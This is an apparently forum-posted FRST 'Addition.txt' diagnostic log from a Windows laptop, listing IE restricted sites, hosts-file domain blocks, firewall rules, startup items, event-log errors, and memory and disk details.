IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\123simsen.com -> www.123simsen.com

There are 7871 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 03:04 - 2016-02-27 12:18 - 00451073 ____R C:\Windows\system32\Drivers\etc\hosts

127.0.0.1	down.baidu2016.com
127.0.0.1	123.sogou.com
127.0.0.1	www.czzsyzgm.com
127.0.0.1	www.czzsyzxl.com127.0.0.1	www.007guard.com
127.0.0.1	007guard.com
127.0.0.1	008i.com
127.0.0.1	www.008k.com
127.0.0.1	008k.com
127.0.0.1	www.00hq.com
127.0.0.1	00hq.com
127.0.0.1	010402.com
127.0.0.1	www.032439.com
127.0.0.1	032439.com
127.0.0.1	www.0scan.com
127.0.0.1	0scan.com
127.0.0.1	1000gratisproben.com
127.0.0.1	www.1000gratisproben.com
127.0.0.1	1001namen.com
127.0.0.1	www.1001namen.com
127.0.0.1	100888290cs.com
127.0.0.1	www.100888290cs.com
127.0.0.1	www.100sexlinks.com
127.0.0.1	100sexlinks.com
127.0.0.1	10sek.com
127.0.0.1	www.10sek.com
127.0.0.1	www.1-2005-search.com
127.0.0.1	1-2005-search.com
127.0.0.1	123fporn.info
127.0.0.1	www.123fporn.info
127.0.0.1	123haustiereundmehr.com

There are 15473 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3127553534-2473892740-565383663-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Ivushka\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{cb0ee9f5-3b98-409d-b784-0c6e70c89097}.JPG
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AvgUi"
HKLM\...\StartupApproved\Run32: => "AVG_UI"
HKLM\...\StartupApproved\Run32: => "ospd_us_014010206"
HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\StartupApproved\Run: => "Zoner Photo Studio Service 16"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{8DB36C7C-8D6E-477E-90C2-8E67E51BECAC}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{27189D1A-0528-46CD-9B55-2E2D5C6B544C}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoPortal\Lenovo.Portal.exe
FirewallRules: [{82B00790-1264-44F5-B144-8B58D60FEAF1}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{C57D1A23-17DB-48EC-A29C-FD9A686D3E2C}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{028548B2-9F7E-4A4D-B8E5-B06659C67AE4}] => (Allow) C:\Program Files (x86)\Lenovo\Lenovo Photo Master\subsys\AdvPhotoEditor\PhotoDirector5.exe
FirewallRules: [{58DD5D22-C3D8-4B44-B5F9-57D082EAD818}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6562CF7D-69D4-4F6A-B91C-008BB6403BFD}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{7F47DB6A-AC41-48D8-B57B-1AF43989F805}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{8915A2C7-759F-45AF-877F-E505FC153CF3}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{A7560CCF-0043-4E8A-ACA3-60D132300C01}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{42C8CC89-CCA8-404B-AC2E-E2F191CF8496}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{45C6FAB2-79CF-4E08-B2B6-C105EB6FA659}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{2BAB1A6F-45F6-447A-8D05-F0741AD1BAFE}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
FirewallRules: [{2DB6106F-CEFA-47C9-A1DA-AD3C38069E0A}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
FirewallRules: [{1DE1BFF2-77B0-4812-97DA-0F972EB2ED04}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{30A57E11-2C7A-4863-B734-758B0F197DA9}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{C465FE4D-5545-4C5A-9C12-32CB118B0CD7}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
FirewallRules: [{BF7E7F3E-A136-4220-8298-4A311B5FB378}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{B4E6D176-5643-4D37-BC4E-7D75DD515B75}] => (Allow) C:\Program Files (x86)\AVG\Av\avgdiagex.exe
FirewallRules: [{05302758-1B7D-4116-B899-6994190DF2F9}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
FirewallRules: [{A5EC9054-6A63-4A2E-B642-FC73B20F35AD}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
FirewallRules: [{CAD69A1F-4328-460D-8860-6E7FFEFF01AB}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\RM.exe
FirewallRules: [{C460271C-94FB-4C56-90D4-BB5A738659F8}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\RM.exe
FirewallRules: [{3BF01077-4DA9-4FFD-A533-B04A2C25126B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\NGStudio.exe
FirewallRules: [{3BF2A419-DA75-4AC1-A77A-07DFE2A5209D}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\NGStudio.exe
FirewallRules: [{C426CF05-36B9-409C-BBD2-56D105BF84F2}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\UMI.exe
FirewallRules: [{7BA5FD65-09E4-4CB5-A5C0-204A4850671C}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 17\programs\UMI.exe
FirewallRules: [{C499627A-74B0-4B82-A217-9E31771611BA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

21-02-2016 16:39:47 Installed Pinnacle Studio 17.
27-02-2016 08:35:40 Removed Pinnacle Studio 17.

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (02/28/2016 08:55:42 AM) (Source: MsiInstaller) (EventID: 1024) (User: LAPTOP-9N491QR6)
Description: Product: Adobe Acrobat Reader DC - Czech - Update '{AC76BA86-7AD7-0000-2550-AC0F0A4E5B00}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127

Error: (02/27/2016 08:35:47 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (02/26/2016 09:15:32 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/24/2016 10:03:15 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/23/2016 09:31:59 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/23/2016 06:25:26 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/21/2016 09:27:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/21/2016 05:46:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program NGStudio.exe version 17.0.0.128 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: c9c

Start Time: 01d16d0eaa35f5a5

Termination Time: 202

Application Path: C:\Program Files (x86)\Pinnacle\Studio 17\programs\NGStudio.exe

Report Id: 18e389c8-d906-11e5-9bda-40b89af919ba

Faulting package full name: 

Faulting package-relative application ID:

Error: (02/21/2016 04:39:54 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (02/21/2016 03:50:51 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-9N491QR6)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (02/28/2016 08:46:01 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (02/28/2016 08:40:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth Service service failed to start due to the following error: 
%%109

Error: (02/28/2016 08:40:24 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Spybot-S&D 2 Security Center Service service depends on the Security Center service which failed to start because of the following error: 
%%1068

Error: (02/28/2016 08:40:24 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Security Center service depends on the Windows Management Instrumentation service which failed to start because of the following error: 
%%1115

Error: (02/28/2016 08:40:20 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv64.dll

Error: (02/28/2016 08:40:20 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv64.dll

Error: (02/28/2016 08:40:12 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv64.dll

Error: (02/28/2016 08:40:06 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session4 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (02/28/2016 08:40:06 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session4 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (02/28/2016 08:40:06 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session4 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.


==================== Memory info =========================== 

Processor: AMD A10-8700P Radeon R6, 10 Compute Cores 4C+6G
Percentage of memory in use: 34%
Total physical RAM: 7638.18 MB
Available physical RAM: 5027.7 MB
Total Virtual: 8854.18 MB
Available Virtual: 5959.82 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:886.8 GB) (Free:753.46 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.48 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5E8DA436)

Partition: GPT.

==================== End of Addition.txt ============================